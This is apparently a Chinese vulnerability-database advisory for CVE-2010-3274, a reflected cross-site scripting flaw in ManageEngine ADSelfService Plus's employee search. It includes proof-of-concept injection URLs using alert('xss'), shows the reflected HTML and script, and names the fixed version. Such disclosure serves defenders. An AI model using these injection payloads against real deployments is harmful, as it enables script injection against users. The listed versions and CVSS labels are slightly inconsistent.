正文

Zoho ManageEngine ADSelfService Plus 至 4.3 Search Engine EmployeeSearch.cc searchString 跨站点脚本漏洞

admin
admin V管理员 /0 评论 /10 阅读
0414
此篇文章发布距今已超过1127天,您需要注意文章的内容或图片是否可用!

CVE编号

CVE-2010-3274

利用情况

暂无

补丁情况

N/A

披露时间

2011-02-18
漏洞描述
ManageEngine ADSelfService Plus是一个安全的,基于Web的最终用户自助服务密码重置方案。ManageEngine ADSelfService Plus存在安全漏洞,相关雇员搜索功能存在跨站脚本问题。第一个问题存在于http://SERVER/EmployeeSearch.cc?actionId=showList中,提交类似如下注入:http://SERVER/EmployeeSearch.cc?actionId=showList&searchString=alice%22%20onmouseover=%22alert%28%27xss%27%29&parameterName=name&searchType=contains如上会导致如下的HTML提交给用户:<option value="equals" > Equals</option></select><input type="text" name="searchString" id="searchTextField" class="textfield" value="alice" onmouseover="alert('xss')" onkeypress="javascript:return searchOnKeyPressEvent(event)"><input type="button" name="search" id="search" class="button" value="&nbsp;Go&nbsp;" onclick="javascript:searchAD()"></td><tr>第二个问题存在于http://SERVER/EmployeeSearch.cc?actionId=Search,此页面接收搜索参数,然后创建发送给http://SERVER/EmployeeSearch.cc?actionId=showList的表单。在创建过程中,未过滤输入会以如下所示的javasript块反映给用户:<script> var searchValue = 'alice'; alert('xss'); var a='a'; var paramName = 'name'; var searchType = 'contains';</script>如上的例子可通过如下链接生成:http://SERVER/EmployeeSearch.cc?actionId=Search&amp;parameterName=name&amp;searchType=contains&amp;searchString=alice%22+onMouseOver%3D%22javascript%3Aalert%28%27xss%27%29
解决建议
ZOHO Corporation ManageEngine ADSelfService Plus 4.5 Build 4500已经修复此漏洞,建议用户下载使用:http://www.manageengine.com/products/self-service-password/index.html
参考链接
http://secunia.com/advisories/43241
http://securityreason.com/securityalert/8089
http://www.coresecurity.com/content/zoho-manageengine-vulnerabilities
http://www.osvdb.org/70871
http://www.osvdb.org/70872
http://www.securityfocus.com/archive/1/516396/100/0/threaded
http://www.securityfocus.com/bid/46331
http://www.vupen.com/english/advisories/2011/0392
https://exchange.xforce.ibmcloud.com/vulnerabilities/65349
受影响软件情况
# 类型 厂商 产品 版本 影响面
1
运行在以下环境
应用 zohocorp manageengine_adselfservice_plus * Up to
(including)
4.4
CVSS3评分 4.3
  • 攻击路径 网络
  • 攻击复杂度 N/A
  • 权限要求 无
  • 影响范围 N/A
  • 用户交互 需要
  • 可用性 无
  • 保密性 无
  • 完整性 部分地
AV:N/AC:M/Au:N/C:N/I:P/A:N CWE-ID 漏洞类型 CWE-79 在Web页面生成时对输入的转义处理不恰当(跨站脚本)